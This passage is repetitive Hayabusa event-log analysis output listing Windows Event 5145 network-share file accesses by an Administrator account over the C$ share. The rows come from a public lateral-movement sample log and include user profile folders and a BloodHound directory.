10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos\Sample Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos\Sample Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV\Sample Media\desktop.ini | IP 
Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV\Sample Media | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$ | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Downloads\desktop.ini | IP 
Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\server01$\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Links | IP Addr: 
10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Links\desktop.ini | 
IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Documents | IP 
Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Pictures | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Contacts | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\locales | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors\DebugBuilds | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 